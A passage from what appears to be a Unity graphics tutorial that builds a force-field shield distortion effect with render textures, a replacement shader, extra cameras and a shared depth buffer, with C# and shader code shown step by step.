<span class="n">shieldRT</span> <span class="o">=</span> <span class="k">new</span> <span class="n">RenderTexture</span><span class="p">(</span><span class="n">Screen</span><span class="p">.</span><span class="n">width</span><span class="o">/</span><span class="mi">4</span><span class="p">,</span><span class="n">Screen</span><span class="p">.</span><span class="n">height</span><span class="o">/</span><span class="mi">4</span><span class="p">,</span><span class="mi">0</span><span class="p">,</span> <span class="n">RenderTextureFormat</span><span class="p">.</span><span class="n">Default</span><span class="p">);</span>
<span class="n">shieldRT</span><span class="p">.</span><span class="n">wrapMode</span> <span class="o">=</span> <span class="n">TextureWrapMode</span><span class="p">.</span><span class="n">Repeat</span><span class="p">;</span>
<span class="n">effectMaterial</span> <span class="o">=</span> <span class="k">new</span> <span class="n">Material</span><span class="p">(</span><span class="n">Shader</span><span class="p">.</span><span class="n">Find</span><span class="p">(</span><span class="s">"Custom/Composite"</span><span class="p">));</span>
<span class="n">mainCam</span> <span class="o">=</span> <span class="n">GetComponent</span><span class="o"><</span><span class="n">Camera</span><span class="o">></span><span class="p">();</span>
<span class="n">mainCam</span><span class="p">.</span><span class="n">SetTargetBuffers</span><span class="p">(</span><span class="n">screenRT</span><span class="p">.</span><span class="n">colorBuffer</span><span class="p">,</span> <span class="n">screenRT</span><span class="p">.</span><span class="n">depthBuffer</span><span class="p">);</span>
<span class="n">distortCam</span> <span class="o">=</span> <span class="k">new</span> <span class="n">GameObject</span><span class="p">(</span><span class="s">"DistortionCam"</span><span class="p">).</span><span class="n">AddComponent</span><span class="o"><</span><span class="n">Camera</span><span class="o">></span><span class="p">();</span>
<span class="n">distortCam</span><span class="p">.</span><span class="n">enabled</span> <span class="o">=</span> <span class="nb">false</span><span class="p">;</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">OnPostRender</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">distortCam</span><span class="p">.</span><span class="n">CopyFrom</span><span class="p">(</span><span class="n">mainCam</span><span class="p">);</span>
<span class="n">distortCam</span><span class="p">.</span><span class="n">backgroundColor</span> <span class="o">=</span> <span class="n">Color</span><span class="p">.</span><span class="n">grey</span><span class="p">;</span>
<span class="n">distortCam</span><span class="p">.</span><span class="n">cullingMask</span> <span class="o">=</span> <span class="mi">1</span> <span class="o"><<</span> <span class="n">LayerMask</span><span class="p">.</span><span class="n">NameToLayer</span><span class="p">(</span><span class="s">"Shield"</span><span class="p">);</span>
<span class="n">distortCam</span><span class="p">.</span><span class="n">targetTexture</span> <span class="o">=</span> <span class="n">shieldRT</span><span class="p">;</span>
<span class="n">distortCam</span><span class="p">.</span><span class="n">Render</span> <span class="p">();</span>
<span class="n">effectMaterial</span><span class="p">.</span><span class="n">SetTexture</span><span class="p">(</span><span class="s">"_DistortionTex"</span><span class="p">,</span> <span class="n">shieldRT</span><span class="p">);</span>
<span class="n">Graphics</span><span class="p">.</span><span class="n">Blit</span><span class="p">(</span><span class="n">screenRT</span><span class="p">,</span> <span class="n">null</span><span class="p">,</span> <span class="n">effectMaterial</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
<p>If you run this now (and make the shieldRT public), you’ll be able to see that we are successfully drawing into our shield buffer, but our effect shader isn’t doing anything useful with that data yet, so let’s look at that next. For this initial step, let’s modify the composite shader to simply subtract the G and B values of the distortion texture from the screen uvs:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">sampler2D</span> <span class="n">_DistortionTex</span><span class="p">;</span>
<span class="n">fixed4</span> <span class="nf">frag</span><span class="p">(</span><span class="n">vOUT</span> <span class="n">i</span><span class="p">)</span> <span class="o">:</span> <span class="n">COLOR</span>
<span class="p">{</span>
<span class="n">fixed4</span> <span class="n">distort</span> <span class="o">=</span> <span class="n">tex2D</span><span class="p">(</span><span class="n">_DistortionTex</span><span class="p">,</span> <span class="n">i</span><span class="p">.</span><span class="n">uv</span><span class="p">);</span>
<span class="n">fixed4</span> <span class="n">tex</span> <span class="o">=</span> <span class="n">tex2D</span><span class="p">(</span><span class="n">_MainTex</span><span class="p">,</span> <span class="n">fixed2</span><span class="p">(</span><span class="n">i</span><span class="p">.</span><span class="n">uv</span><span class="p">.</span><span class="n">xy</span> <span class="o">-</span> <span class="p">(</span><span class="n">distort</span><span class="p">.</span><span class="n">gb</span> <span class="o">-</span> <span class="mf">0.5</span><span class="p">)));</span>
<span class="k">return</span> <span class="n">tex</span><span class="p">;</span>
<span class="err">}</span></code></pre></figure>
<p>If you hit run now, this is what the sample scene should look like:</p>
<div align="center">
<img src="/images/post_images/2016-1-15/checkerdistort.gif" />
<br />
<br />
</div>
<p>Not exactly what we’re after - but at least it’s interesting!</p>
<p>Now that we’ve proven that the secondary buffer is working, it’s time to think about how we want our shield to look. When I think of a force field, I think of it as energy repelling things away from whatever is inside the shield. So I think I’d like my shield to communicate that visually. Let’s shift the UVs on the edge of the shield away from the center of the circle.</p>
<p>To do this, we’re going to use a replacement shader, which is going to swap the shader on our shield bubbles when they’re rendered by our distortion camera. This will let us write the data we need to our secondary buffer without changing how the bubble looks in game.</p>
<p>Let’s use the following as a starting point:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">CGPROGRAM</span>
<span class="cp">#pragma vertex vert
#pragma fragment frag
#include "ShieldEffect.cginc"
</span>
<span class="k">struct</span> <span class="nc">vIN</span>
<span class="p">{</span>
<span class="n">float4</span> <span class="n">vertex</span> <span class="o">:</span> <span class="n">POSITION</span><span class="p">;</span>
<span class="n">float2</span> <span class="n">texcoord</span> <span class="o">:</span> <span class="n">TEXCOORD0</span><span class="p">;</span>
<span class="n">float3</span> <span class="n">normal</span> <span class="o">:</span> <span class="n">NORMAL</span><span class="p">;</span>
<span class="p">};</span>
<span class="k">struct</span> <span class="nc">vOUT</span>
<span class="p">{</span>
<span class="n">float4</span> <span class="n">pos</span> <span class="o">:</span> <span class="n">SV_POSITION</span><span class="p">;</span>
<span class="n">float3</span> <span class="n">oPos</span> <span class="o">:</span> <span class="n">TEXCOORD0</span><span class="p">;</span>
<span class="n">float3</span> <span class="n">wPos</span> <span class="o">:</span> <span class="n">TEXCOORD1</span><span class="p">;</span>
<span class="n">float3</span> <span class="n">wNorm</span> <span class="o">:</span> <span class="n">TEXCOORD2</span><span class="p">;</span>
<span class="n">float3</span> <span class="n">objPos</span> <span class="o">:</span> <span class="n">TEXCOORD3</span><span class="p">;</span>
<span class="p">};</span>
<span class="n">sampler2D</span> <span class="n">_MainTex</span><span class="p">;</span>
<span class="n">vOUT</span> <span class="nf">vert</span><span class="p">(</span><span class="n">vIN</span> <span class="n">v</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">vOUT</span> <span class="n">o</span><span class="p">;</span>
<span class="n">o</span><span class="p">.</span><span class="n">pos</span> <span class="o">=</span> <span class="n">mul</span><span class="p">(</span><span class="n">UNITY_MATRIX_MVP</span><span class="p">,</span> <span class="n">v</span><span class="p">.</span><span class="n">vertex</span><span class="p">);</span>
<span class="n">float3</span> <span class="n">zeroPos</span> <span class="o">=</span> <span class="n">mul</span><span class="p">(</span><span class="n">UNITY_MATRIX_MVP</span><span class="p">,</span> <span class="n">float4</span><span class="p">(</span><span class="mf">0.0</span><span class="p">,</span><span class="mf">0.0</span><span class="p">,</span><span class="mf">0.0</span><span class="p">,</span><span class="mf">1.0</span><span class="p">));</span>
<span class="n">o</span><span class="p">.</span><span class="n">wPos</span> <span class="o">=</span> <span class="n">mul</span><span class="p">(</span><span class="n">_Object2World</span><span class="p">,</span> <span class="n">v</span><span class="p">.</span><span class="n">vertex</span><span class="p">);</span>
<span class="n">o</span><span class="p">.</span><span class="n">wNorm</span> <span class="o">=</span> <span class="n">normalize</span><span class="p">(</span><span class="n">mul</span><span class="p">(</span><span class="n">fixed4</span><span class="p">(</span><span class="n">v</span><span class="p">.</span><span class="n">normal</span><span class="p">,</span> <span class="mf">0.0</span><span class="p">),</span> <span class="n">_World2Object</span><span class="p">).</span><span class="n">xyz</span><span class="p">);</span>
<span class="n">o</span><span class="p">.</span><span class="n">objPos</span> <span class="o">=</span> <span class="n">v</span><span class="p">.</span><span class="n">vertex</span><span class="p">.</span><span class="n">xyz</span><span class="p">;</span>
<span class="n">o</span><span class="p">.</span><span class="n">oPos</span> <span class="o">=</span> <span class="n">normalize</span><span class="p">(</span><span class="n">o</span><span class="p">.</span><span class="n">pos</span><span class="p">.</span><span class="n">xyz</span> <span class="o">-</span> <span class="n">zeroPos</span><span class="p">.</span><span class="n">xyz</span><span class="p">);</span>
<span class="k">return</span> <span class="n">o</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">fixed4</span> <span class="nf">frag</span><span class="p">(</span><span class="n">vOUT</span> <span class="n">i</span><span class="p">)</span> <span class="o">:</span> <span class="n">COLOR</span>
<span class="p">{</span>
<span class="n">fixed4</span> <span class="n">tex</span> <span class="o">=</span> <span class="n">fixed4</span><span class="p">(</span><span class="n">i</span><span class="p">.</span><span class="n">oPos</span><span class="p">.</span><span class="n">x</span><span class="p">,</span><span class="mf">0.0</span><span class="p">,</span><span class="n">i</span><span class="p">.</span><span class="n">oPos</span><span class="p">.</span><span class="n">y</span><span class="p">,</span> <span class="mf">1.0</span><span class="p">);</span>
<span class="kt">float</span> <span class="n">intensity</span> <span class="o">=</span> <span class="n">CalcShieldIntensity16</span><span class="p">(</span><span class="n">i</span><span class="p">.</span><span class="n">objPos</span><span class="p">);</span>
<span class="n">float3</span> <span class="n">viewdir</span> <span class="o">=</span> <span class="n">normalize</span><span class="p">(</span><span class="n">_WorldSpaceCameraPos</span> <span class="o">-</span> <span class="n">i</span><span class="p">.</span><span class="n">wPos</span><span class="p">);</span>
<span class="kt">float</span> <span class="n">ang</span> <span class="o">=</span> <span class="mf">1.0</span><span class="o">-</span> <span class="n">dot</span><span class="p">(</span><span class="n">viewdir</span><span class="p">,</span> <span class="n">i</span><span class="p">.</span><span class="n">wNorm</span><span class="p">)</span> <span class="o">+</span> <span class="n">intensity</span><span class="p">;</span>
<span class="k">return</span> <span class="p">(</span><span class="n">tex</span> <span class="o">*</span> <span class="n">ang</span><span class="p">)</span> <span class="o">+</span> <span class="mf">0.5</span><span class="p">;</span>
<span class="err">}</span>
<span class="n">ENDCG</span></code></pre></figure>
<p>Before we go about plumbing this in to our game, let’s talk about what’s going on here. First, since we want our effect to look the same no matter what angle we’re viewing from, it simplifies a lot of things if we work in screenspace for generating the actual colours that we’re writing to the buffer. What we want is for the colours we write to be representative of their direction from the center of the shield, so to do that, we transform the origin point of the object (the zeroPos variable) into screen space as well, and then subtract that point from our vertex’s position in screen space. This gives us a nice direction vector to work with.</p>
<p>In the fragment shader, we turn this direction vector into a colour, and we use a rim light calculation to attenuate the colours towards the center of the shield (since the normals for the center of the screen space sphere will always point towards the camera). Then we add 0.5 to everything, so that we can use this buffer to distort things in both directions in U,V space (since you can’t write a negative colour into a buffer). This means that any pixel in the buffer which is written out as 128,128,128 will do nothing, but values above and below are valid.</p>
<p>Finally, we add the intensity calculation to our fragment so that our impacts can distort more along their edges. This obviously won’t be 100% accurate because the direction of the distortion isn’t really being taken into account, but it creates a good looking effect anyway. You could spend more time making sure that the impact bubbles distort in a consistent way out from their center, but for brevity’s sake I’m not going to in this post.</p>
<p>This is going to give us a shield buffer that looks something like this (assuming 2 shields on screen):</p>
<div align="center">
<img src="/images/post_images/2016-1-15/shield_buffer.png" />
<br />
<br />
</div>
<p>Now all we need to do is get the replacement shader working. Just get the shader into your script the same way we loaded in the Composite shader, and make this really simple 1 line change to the Render call in OnPostRender:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">distortCam</span><span class="p">.</span><span class="n">RenderWithShader</span><span class="p">(</span><span class="n">shieldReplacementShader</span><span class="p">,</span> <span class="n">null</span><span class="p">);</span></code></pre></figure>
<p>And with that, we should have the following!</p>
<div align="center">
<img src="/images/post_images/2016-1-15/second_distort.gif" />
<br />
<br />
</div>
<p>Note that you may find that the effect is too intense even with the replacement shader (this is extremely noticeable if you’re working with the scene I gave you at the beginning of the article). In that case you may want to tone down the intensity of the effect by adding a multiplication into the compostie shader:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">fixed4</span> <span class="n">tex</span> <span class="o">=</span> <span class="n">tex2D</span><span class="p">(</span><span class="n">_MainTex</span><span class="p">,</span> <span class="n">fixed2</span><span class="p">(</span><span class="n">i</span><span class="p">.</span><span class="n">uv</span><span class="p">.</span><span class="n">xy</span> <span class="o">+</span> <span class="p">(</span><span class="n">distort</span><span class="p">.</span><span class="n">gb</span> <span class="o">-</span> <span class="mf">0.5</span><span class="p">)</span> <span class="o">*</span> <span class="mf">0.1</span> <span class="p">));</span></code></pre></figure>
<p>if you’re following along at home, the your sample scene should look like this if you grab your shield and move it around:</p>
<div align="center">
<img src="/images/post_images/2016-1-15/checkertranslate.gif" />
<br />
<br />
</div>
<p>You may also notice that the edges of your shield bubble are now a little bit jagged. This is because we’re rendering to a smaller buffer for the shield effect. This can be alleviated by increasing the size of the shield renderTexture (which is EXTREMELY expensive), or doing some sort of blur operation on your shield buffer (probably less expensive). However we’re not going to worry about it today because by the end of the article we’re going to have an approach that hides this jagginess.</p>
<p>This is great and all, but now our shield looks all weird since we’re distorting the UVs that it’s being drawn with too. I’d like to preserve the nice plasma texture on the shield, so I’m going to move the actual rendering of the shield to a different camera, and make sure the camera that we’re distorting the UVs on doesn’t see objects on the shield layer. This is really easy to do, but will leave us with a different problem. We’ll get to that in a second.</p>
<p>First, let’s modify our c# effect script to create this new camera for us:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">RenderTexture</span> <span class="n">shieldRT</span><span class="p">;</span>
<span class="n">RenderTexture</span> <span class="n">screenRT</span><span class="p">;</span>
<span class="n">Camera</span> <span class="n">distortCam</span><span class="p">;</span>
<span class="n">Camera</span> <span class="n">mainCam</span><span class="p">;</span>
<span class="n">Camera</span> <span class="n">shieldCam</span><span class="p">;</span>
<span class="n">Shader</span> <span class="n">shieldReplacementShader</span><span class="p">;</span>
<span class="n">Material</span> <span class="n">effectMaterial</span><span class="p">;</span>
<span class="kt">void</span> <span class="nf">Awake</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">screenRT</span> <span class="o">=</span> <span class="k">new</span> <span class="n">RenderTexture</span><span class="p">(</span><span class="n">Screen</span><span class="p">.</span><span class="n">width</span><span class="p">,</span> <span class="n">Screen</span><span class="p">.</span><span class="n">height</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">RenderTextureFormat</span><span class="p">.</span><span class="n">Default</span><span class="p">);</span>
<span class="n">screenRT</span><span class="p">.</span><span class="n">wrapMode</span> <span class="o">=</span> <span class="n">TextureWrapMode</span><span class="p">.</span><span class="n">Repeat</span><span class="p">;</span>
<span class="n">shieldRT</span> <span class="o">=</span> <span class="k">new</span> <span class="n">RenderTexture</span><span class="p">(</span><span class="n">Screen</span><span class="p">.</span><span class="n">width</span><span class="o">/</span><span class="mi">4</span><span class="p">,</span><span class="n">Screen</span><span class="p">.</span><span class="n">height</span><span class="o">/</span><span class="mi">4</span><span class="p">,</span><span class="mi">0</span><span class="p">,</span> <span class="n">RenderTextureFormat</span><span class="p">.</span><span class="n">Default</span><span class="p">);</span>
<span class="n">shieldRT</span><span class="p">.</span><span class="n">wrapMode</span> <span class="o">=</span> <span class="n">TextureWrapMode</span><span class="p">.</span><span class="n">Repeat</span><span class="p">;</span>
<span class="n">shieldReplacementShader</span> <span class="o">=</span> <span class="n">Shader</span><span class="p">.</span><span class="n">Find</span><span class="p">(</span><span class="s">"Custom/Replacement"</span><span class="p">);</span>
<span class="n">effectMaterial</span> <span class="o">=</span> <span class="k">new</span> <span class="n">Material</span><span class="p">(</span><span class="n">Shader</span><span class="p">.</span><span class="n">Find</span><span class="p">(</span><span class="s">"Custom/Composite"</span><span class="p">));</span>
<span class="n">mainCam</span> <span class="o">=</span> <span class="n">GetComponent</span><span class="o"><</span><span class="n">Camera</span><span class="o">></span><span class="p">();</span>
<span class="n">mainCam</span><span class="p">.</span><span class="n">SetTargetBuffers</span><span class="p">(</span><span class="n">screenRT</span><span class="p">.</span><span class="n">colorBuffer</span><span class="p">,</span> <span class="n">screenRT</span><span class="p">.</span><span class="n">depthBuffer</span><span class="p">);</span>
<span class="n">mainCam</span><span class="p">.</span><span class="n">cullingMask</span> <span class="o">&=</span> <span class="o">~</span><span class="p">(</span><span class="mi">1</span> <span class="o"><<</span> <span class="n">LayerMask</span><span class="p">.</span><span class="n">NameToLayer</span><span class="p">(</span><span class="s">"Shield"</span><span class="p">));</span>
<span class="n">distortCam</span> <span class="o">=</span> <span class="k">new</span> <span class="n">GameObject</span><span class="p">(</span><span class="s">"DistortionCam"</span><span class="p">).</span><span class="n">AddComponent</span><span class="o"><</span><span class="n">Camera</span><span class="o">></span><span class="p">();</span>
<span class="n">distortCam</span><span class="p">.</span><span class="n">enabled</span> <span class="o">=</span> <span class="nb">false</span><span class="p">;</span>
<span class="n">shieldCam</span> <span class="o">=</span> <span class="k">new</span> <span class="n">GameObject</span><span class="p">(</span><span class="s">"Shield Cam"</span><span class="p">).</span><span class="n">AddComponent</span><span class="o"><</span><span class="n">Camera</span><span class="o">></span><span class="p">();</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">Update</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">shieldCam</span><span class="p">.</span><span class="n">cullingMask</span> <span class="o">=</span> <span class="n">distortCam</span><span class="p">.</span><span class="n">cullingMask</span><span class="p">;</span>
<span class="n">shieldCam</span><span class="p">.</span><span class="n">clearFlags</span> <span class="o">=</span> <span class="n">CameraClearFlags</span><span class="p">.</span><span class="n">Depth</span><span class="p">;</span>
<span class="n">shieldCam</span><span class="p">.</span><span class="n">depth</span> <span class="o">=</span> <span class="n">mainCam</span><span class="p">.</span><span class="n">depth</span> <span class="o">+</span> <span class="mi">1</span><span class="p">;</span>
<span class="n">shieldCam</span><span class="p">.</span><span class="n">transform</span><span class="p">.</span><span class="n">position</span> <span class="o">=</span> <span class="n">mainCam</span><span class="p">.</span><span class="n">transform</span><span class="p">.</span><span class="n">position</span><span class="p">;</span>
<span class="n">shieldCam</span><span class="p">.</span><span class="n">transform</span><span class="p">.</span><span class="n">rotation</span> <span class="o">=</span> <span class="n">mainCam</span><span class="p">.</span><span class="n">transform</span><span class="p">.</span><span class="n">rotation</span><span class="p">;</span>
<span class="n">shieldCam</span><span class="p">.</span><span class="n">cullingMask</span> <span class="o">=</span> <span class="mi">1</span> <span class="o"><<</span> <span class="n">LayerMask</span><span class="p">.</span><span class="n">NameToLayer</span><span class="p">(</span><span class="s">"Shield"</span><span class="p">);</span>
<span class="n">shieldCam</span><span class="p">.</span><span class="n">fieldOfView</span> <span class="o">=</span> <span class="n">mainCam</span><span class="p">.</span><span class="n">fieldOfView</span><span class="p">;</span>
<span class="n">shieldCam</span><span class="p">.</span><span class="n">orthographic</span> <span class="o">=</span> <span class="n">mainCam</span><span class="p">.</span><span class="n">orthographic</span><span class="p">;</span>
<span class="n">shieldCam</span><span class="p">.</span><span class="n">orthographicSize</span> <span class="o">=</span> <span class="n">mainCam</span><span class="p">.</span><span class="n">orthographicSize</span><span class="p">;</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">OnPostRender</span><span class="p">(){...}</span></code></pre></figure>
<p>Notice that we also added a line to remove the Shield layer from the main camera’s culling mask. Now that we have a second camera doing this for us, that camera doesn’t need to create draw calls to incorrectly render the shield colour.</p>
<div align="center">
<img src="/images/post_images/2016-1-15/third_distort.gif" />
<br />
<br />
</div>
<p>With this change, our shield looks a lot better, but like I said, this has exacerbated another problem we have. Earlier we accepted that our distortion effect wasn’t going to have depth information, and therefore would distort things in front of the shield, but now, we also don’t have depth information for the shield colour itself, which means that shields will render on top of everything else. This is much more noticeable, and makes this effect really unwieldy, so we’re going to have to do something about that.</p>
<div align="center">
<img src="/images/post_images/2016-1-15/depth_problem.png" />
<br />
<br />
</div>
<h2>From Full Screen Effect to Projective Texturing</h2>
<p>Buckle up, things are about to get fun.</p>
<p>All the problems that we have right now are due to us treating the shields like they aren’t geometry: we’re rendering them to a buffer to distort the whole screen, and then using a secondary camera which has no depth information to paste them over the rest of the game. Wouldn’t it be great if we could use our depth buffer to occlude both the distortion and colours of the shield?</p>
<p>In the past, I’ve seen this done by manually calculating a depth pass, but this is expensive and requires you to double the draw calls of everything you want included in the depth buffer that you’re going to use to occlude your warp effect; so instead of doing that, here’s what we’re going to do today:</p>
<ul>
<li>Render the main camera (without warp) to a render texture</li>
<li>Render the multi colored shield buffer as usual</li>
<li>Copy the main camera render texture to the buffer that the shield camera will draw into</li>
<li>Share a depth buffer between our main camera and our shield camera so that our shields are occluded properly without incurring extra draw calls</li>
<li>Continue to render our shields after everything else, but pass the main camera render texture to our shield shaders, and let them deal with the warp effect themselves so that when the shield is occluded, the warp effect is occluded too</li>
<li>Blit the shield camera render texture to the screen</li>
</ul>
<p>It’s a lot of changes, but at the end of the day we’re going to end up with a really really easy to use shield bubble effect that behaves exactly like we expect it should without incurring extra draw calls or doing a lot of extra full screen operations. So without further ado, let’s take it from the top!</p>
<h3>Rendering the main camera to a render texture</h3>
<p>The first part of this list should be pretty easy after all the work with render textures we did above. In fact we’re already rendering the main camera to a render texture (the screenRT) so we’re actually in good shape.</p>
<p>First of all, we need to stop our main camera from blitting to the screen, and we need to set our offscreen buffer to a global shader uniform so we can access it later. We’re going to change the our OnPostRender function in our c# script from this:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="kt">void</span> <span class="nf">OnPostRender</span><span class="p">()</span>
<span class="p">{</span>
<span class="p">...</span>
<span class="n">effectMaterial</span><span class="p">.</span><span class="n">SetTexture</span><span class="p">(</span><span class="s">"_DistortionTex"</span><span class="p">,</span> <span class="n">shieldRT</span><span class="p">);</span>
<span class="n">Graphics</span><span class="p">.</span><span class="n">Blit</span><span class="p">(</span><span class="n">screenRT</span><span class="p">,</span> <span class="n">null</span><span class="p">,</span> <span class="n">effectMaterial</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
<p>To this:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="kt">void</span> <span class="nf">OnPostRender</span><span class="p">()</span>
<span class="p">{</span>
<span class="p">...</span>
<span class="n">Shader</span><span class="p">.</span><span class="n">SetGlobalTexture</span><span class="p">(</span><span class="s">"_DistortionBuffer"</span><span class="p">,</span> <span class="n">shieldRT</span><span class="p">);</span>
<span class="n">Shader</span><span class="p">.</span><span class="n">SetGlobalTexture</span><span class="p">(</span><span class="s">"_ScreenBuffer"</span><span class="p">,</span> <span class="n">screenRT</span><span class="p">);</span>
<span class="n">Graphics</span><span class="p">.</span><span class="n">Blit</span><span class="p">(</span><span class="n">screenRT</span><span class="p">,</span> <span class="n">finalRT</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
<p>One important thing to note here is that if you want objects which have warp be be seen through each other, you’re going to have to render them to this buffer. For our shields, the easiest way to do this is to create a duplicate shield sphere, assign it the optimized (non warp) shader, child it to the original shield sphere and make sure it isn’t on the Shield layer. This isn’t going to work in all cases, but it will for our purposes today.</p>
<p>Notice that we’re no longer going to be setting properties of the composite material. This is because with our new approach, the composite material’s logic is going to be handled by the shield shader, so we don’t actually need the composite any more.</p>
<p>You may also have noticed that the code above references a new RenderTexture. About that:</p>
<h3>Two New RenderTextures</h3>
<p>Step three and four of our new technique hint at some new render textures that we’re going to need. The first of which is our finalRT. This is the render texture that the camera rendering our warp objects will write into. We’ve already got the code to copy our main camera’s output into that texture like we said we’d do, but we also need to set up this render texture. We also need to set up a render texture specifically for storing the depth buffer from the main camera so that we can pass that to our shield camera as well.</p>
<p>Our new Awake function should look like the following:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">RenderTexture</span> <span class="n">shieldRT</span><span class="p">;</span>
<span class="n">RenderTexture</span> <span class="n">screenRT</span><span class="p">;</span>
<span class="n">RenderTexture</span> <span class="n">finalRT</span><span class="p">;</span>
<span class="n">RenderTexture</span> <span class="n">depthRT</span><span class="p">;</span>
<span class="n">Camera</span> <span class="n">distortCam</span><span class="p">;</span>
<span class="n">Camera</span> <span class="n">mainCam</span><span class="p">;</span>
<span class="n">Camera</span> <span class="n">shieldCam</span><span class="p">;</span>
<span class="n">Shader</span> <span class="n">shieldReplacementShader</span><span class="p">;</span>
<span class="n">Material</span> <span class="n">effectMaterial</span><span class="p">;</span>
<span class="kt">void</span> <span class="nf">Awake</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">screenRT</span> <span class="o">=</span> <span class="k">new</span> <span class="n">RenderTexture</span><span class="p">(</span><span class="n">Screen</span><span class="p">.</span><span class="n">width</span><span class="p">,</span> <span class="n">Screen</span><span class="p">.</span><span class="n">height</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">RenderTextureFormat</span><span class="p">.</span><span class="n">Default</span><span class="p">);</span>
<span class="n">screenRT</span><span class="p">.</span><span class="n">wrapMode</span> <span class="o">=</span> <span class="n">TextureWrapMode</span><span class="p">.</span><span class="n">Repeat</span><span class="p">;</span>
<span class="n">finalRT</span> <span class="o">=</span> <span class="k">new</span> <span class="n">RenderTexture</span><span class="p">(</span><span class="n">Screen</span><span class="p">.</span><span class="n">width</span><span class="p">,</span> <span class="n">Screen</span><span class="p">.</span><span class="n">height</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">RenderTextureFormat</span><span class="p">.</span><span class="n">Default</span><span class="p">);</span>
<span class="n">finalRT</span><span class="p">.</span><span class="n">wrapMode</span> <span class="o">=</span> <span class="n">TextureWrapMode</span><span class="p">.</span><span class="n">Repeat</span><span class="p">;</span>
<span class="n">depthRT</span> <span class="o">=</span> <span class="k">new</span> <span class="n">RenderTexture</span><span class="p">(</span><span class="n">Screen</span><span class="p">.</span><span class="n">width</span><span class="p">,</span> <span class="n">Screen</span><span class="p">.</span><span class="n">height</span><span class="p">,</span> <span class="mi">16</span><span class="p">,</span> <span class="n">RenderTextureFormat</span><span class="p">.</span><span class="n">Depth</span><span class="p">);</span>
<span class="n">depthRT</span><span class="p">.</span><span class="n">wrapMode</span> <span class="o">=</span> <span class="n">TextureWrapMode</span><span class="p">.</span><span class="n">Repeat</span><span class="p">;</span>
<span class="n">shieldRT</span> <span class="o">=</span> <span class="k">new</span> <span class="n">RenderTexture</span><span class="p">(</span><span class="n">Screen</span><span class="p">.</span><span class="n">width</span><span class="o">/</span><span class="mi">4</span><span class="p">,</span><span class="n">Screen</span><span class="p">.</span><span class="n">height</span><span class="o">/</span><span class="mi">4</span><span class="p">,</span><span class="mi">16</span><span class="p">,</span> <span class="n">RenderTextureFormat</span><span class="p">.</span><span class="n">Default</span><span class="p">);</span>
<span class="n">shieldRT</span><span class="p">.</span><span class="n">wrapMode</span> <span class="o">=</span> <span class="n">TextureWrapMode</span><span class="p">.</span><span class="n">Repeat</span><span class="p">;</span>
<span class="n">shieldReplacementShader</span> <span class="o">=</span> <span class="n">Shader</span><span class="p">.</span><span class="n">Find</span><span class="p">(</span><span class="s">"Custom/Replacement"</span><span class="p">);</span>
<span class="n">mainCam</span> <span class="o">=</span> <span class="n">GetComponent</span><span class="o"><</span><span class="n">Camera</span><span class="o">></span><span class="p">();</span>
<span class="n">mainCam</span><span class="p">.</span><span class="n">SetTargetBuffers</span><span class="p">(</span><span class="n">screenRT</span><span class="p">.</span><span class="n">colorBuffer</span><span class="p">,</span> <span class="n">depthRT</span><span class="p">.</span><span class="n">depthBuffer</span><span class="p">);</span>
<span class="n">mainCam</span><span class="p">.</span><span class="n">cullingMask</span> <span class="o">&=</span> <span class="o">~</span><span class="p">(</span><span class="mi">1</span> <span class="o"><<</span> <span class="n">LayerMask</span><span class="p">.</span><span class="n">NameToLayer</span><span class="p">(</span><span class="s">"Shield"</span><span class="p">));</span>
<span class="n">distortCam</span> <span class="o">=</span> <span class="k">new</span> <span class="n">GameObject</span><span class="p">(</span><span class="s">"DistortionCam"</span><span class="p">).</span><span class="n">AddComponent</span><span class="o"><</span><span class="n">Camera</span><span class="o">></span><span class="p">();</span>
<span class="n">distortCam</span><span class="p">.</span><span class="n">enabled</span> <span class="o">=</span> <span class="nb">false</span><span class="p">;</span>
<span class="n">shieldCam</span> <span class="o">=</span> <span class="k">new</span> <span class="n">GameObject</span><span class="p">(</span><span class="s">"Shield Cam"</span><span class="p">).</span><span class="n">AddComponent</span><span class="o"><</span><span class="n">Camera</span><span class="o">></span><span class="p">();</span>
<span class="n">shieldCam</span><span class="p">.</span><span class="n">SetTargetBuffers</span><span class="p">(</span><span class="n">finalRT</span><span class="p">.</span><span class="n">colorBuffer</span><span class="p">,</span> <span class="n">depthRT</span><span class="p">.</span><span class="n">depthBuffer</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">...</span></code></pre></figure>
<p>Excellent! Now we have to make sure that our shieldCam is set to not clear anything before it renders, since we now are very deliberately populating it’s buffers with data from our main camera:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="kt">void</span> <span class="nf">Update</span><span class="p">()</span>
<span class="p">{</span>
<span class="p">...</span>
<span class="n">shieldCam</span><span class="p">.</span><span class="n">clearFlags</span> <span class="o">=</span> <span class="n">CameraClearFlags</span><span class="p">.</span><span class="n">Nothing</span><span class="p">;</span>
<span class="p">...</span>
<span class="p">}</span></code></pre></figure>
